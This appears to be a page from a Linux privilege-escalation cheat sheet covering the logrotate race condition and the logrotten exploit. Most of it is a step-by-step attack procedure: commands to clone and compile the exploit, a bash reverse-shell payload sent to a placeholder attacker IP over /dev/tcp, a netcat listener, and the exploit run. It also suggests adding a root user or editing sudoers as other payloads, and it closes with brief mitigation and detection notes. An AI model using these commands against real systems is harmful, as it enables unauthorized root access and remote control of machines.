16.Logrotate

Check logrotate version (if possible)

logrotate --version

View logrotate configuration

cat /etc/logrotate.conf
ls /etc/logrotate.d/

Find logrotate options (create or compress)

grep "create\|compress" /etc/logrotate.conf | grep -v "#"

Clone logrotten exploit

git clone https://github.com/whotwagner/logrotten.git
cd logrotten

Compile logrotten

gcc logrotten.c -o logrotten

Create reverse shell payload

echo 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1' > payload

Start netcat listener (attacker machine)

nc -nlvp <attacker_port>

Run logrotten exploit

./logrotten -p ./payload /tmp/tmp.log

Force logrotate to run (if needed, and if you have sudo)

sudo logrotate -f /etc/logrotate.conf # or a specific file in /etc/logrotate.d/

Check logrotate status file (if you have sudo)

sudo cat /var/lib/logrotate.status

Key Concepts:

  • Log Rotation:

    • logrotate is a utility for managing log files.

    • It rotates, compresses, or removes old log files to prevent disk space exhaustion.

  • Configuration:

    • /etc/logrotate.conf: Global configuration file.

    • /etc/logrotate.d/: Directory for service-specific configurations.

  • Vulnerability:

    • Certain versions of logrotate (3.8.6, 3.11.0, 3.15.0, 3.18.0) are vulnerable.

    • Exploitable when logrotate runs as root and the attacker has write access to the log files.

  • Exploitation:

    • logrotten exploit.

    • Payload injection.

Exploitation Steps (as described):

  1. Check logrotate Configuration:

    • man logrotate or logrotate --help to check version and options.

    • cat /etc/logrotate.conf and ls /etc/logrotate.d/ to view the configurations.

    • grep "create\|compress" /etc/logrotate.conf | grep -v "#" to identify the options used.

  2. Download and Compile logrotten:

    • git clone https://github.com/whotwagner/logrotten.git

    • cd logrotten

    • gcc logrotten.c -o logrotten

  3. Create Payload:

    • echo 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1' > payload

  4. Start Netcat Listener:

    • nc -nlvp <attacker_port>

  5. Run logrotten:

    • ./logrotten -p ./payload /tmp/tmp.log

Important Considerations and Enhancements:

  • Vulnerability Details:

    • The vulnerability stems from how logrotate handles file creation and permissions during rotation.

  • Exploit Reliability:

    • The exploit's success depends on the specific logrotate configuration and system environment.

  • Alternative Payloads:

    • Other payloads can be used, such as adding a root user or modifying /etc/sudoers.

  • Mitigation:

    • Update logrotate to a patched version.

    • Restrict write access to log files.

    • use tools like SELinux or AppArmor to restrict logrotate.

  • Detection:

    • Monitor log file changes.

    • Use intrusion detection systems.

    • Monitor for unexpected root shells.

  • Real World Examples: Researching real world logrotate exploits will help solidify understanding of the attack vectors.

  • Logrotate status file: The logrotate status file can be manipulated, but this is less common than the exploit described.

Previous15.KubernetesNext17.Miscellaneous-techniques

Last updated